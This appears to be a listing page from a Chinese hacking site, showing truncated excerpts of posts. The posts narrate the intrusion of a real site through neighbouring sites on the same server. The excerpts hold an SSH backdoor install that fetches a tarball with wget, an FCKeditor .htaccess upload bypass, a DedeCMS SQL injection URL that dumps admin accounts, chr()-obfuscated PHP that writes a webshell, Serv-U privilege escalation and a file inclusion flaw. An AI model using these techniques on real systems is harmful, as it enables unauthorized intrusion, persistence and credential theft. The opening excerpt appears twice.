记一次踩着别人的脚印入侵
话说今早不知道怎么逛到https://www.webshell.cc/1.txt那里去了PS:后来想起是村长大牛提交的黑页 看见别人挂这个多好看啊,于是小菜也是想起了来检测一番的念头,既然有了想法就开始干活吧,主站打不开了,估计是给弄坏了,于是想起旁注了,看看是不是独立的站点,打开土司的旁注查询,把域名放进去看看,幸亏不是独立的站点 哇!!这个站还真不少..72个,其实还是有好多没法打开.. 开始一...
话说今早不知道怎么逛到https://www.webshell.cc/1.txt那里去了PS:后来想起是村长大牛提交的黑页 看见别人挂这个多好看啊,于是小菜也是想起了来检测一番的念头,既然有了想法就开始干活吧,主站打不开了,估计是给弄坏了,于是想起旁注了,看看是不是独立的站点,打开土司的旁注查询,把域名放进去看看,幸亏不是独立的站点 哇!!这个站还真不少..72个,其实还是有好多没法打开.. 开始一...
ssh后门的设置与登入 1、mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old 2、mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old 3、下载并安装ssh后门: shell-# wgethttp://192.168.1.188/sshbd.tgz shell-# tar zxvf sshbd.tgz sh...
真是杯具了 啊 …… 看来 哪里都有不怕死的 …… 地址已经失效!
利用步骤: 1.创建一个htaccess文件: 代码内容: SetHandler application/x-httpd-php 2.实用编辑器上传htaccess文件. https://www.webshell.cc/FCKeditor/editor/filemanager/upload/test.html https://www.webshell.cc/FCKeditor/editor/filem...
有时候用aspxshell的iisspy功能看不到网站路径跟域名,可以尝试下下面这个方法 1.查询IIS里的所有网站 C:WINDOWSsystem32>cscript.exe iisweb.vbs /query Microsoft (R) Windows Script Host Version 5.6 版权所有(C) Microsoft Corporation 1996-2001。保留所有...
今晚在搞https://www.webshell.cc/的时候拿下旁站权限,但不能夸到目标站的目录下,眼看目标就在眼前却被最后一道关卡给卡死了。之前也有尝试过pr提权,单asp一执行pr就卡死了。。 无奈之下找了群里龙儿心一起来研究,龙儿心经验不错,到shell上立马就搞定了目标站的路径,获取IIS网站路劲和其他基本信息也是使用一个VBS脚本搞定的,这个在我blog中有一个文章帖出来代码。这里我将就...
HWay && Serv-U.php 利用Serv-U的本地权限提升漏洞自动安装Hway!即使服务器的Serv-U密码被更改,只要ServUAdmin.exe可读,它便能读出更改后的密码.此外HWay && Serv-U.php还具有本地端口扫描的功能. 如果服务器的Serv-U的端口,密码都没有更改,那么直接点击”安装Hway”便可安装成功.否则请点击"获取Ser...
搜索关键词:powered by dedecms 首先注册个用户,注册地址: /member/index_do.php?fmdo=user&dopost=regnew 爆管理帐号: /member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,userid,4,5%20from%20%...
简要描述: 后台可以提交构造代码绕过过滤,成功解析生成一句话木马 防黑网。 详细说明: <?php $filen=chr(46).chr(46).chr(47).chr(110).chr(117).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112); $filec=chr(60).chr(63).chr(112).chr(104).chr...
直接看代码: js/calendar.php $lang = (!empty($_GET['lang'])) ? trim($_GET['lang']) : ‘zh_cn’;//没有过滤,很明显的包含漏洞 if (!file_exists(‘../languages/’ . $lang . ‘/calendar.php’)) { $lang = ‘zh_cn’; } require(dirname...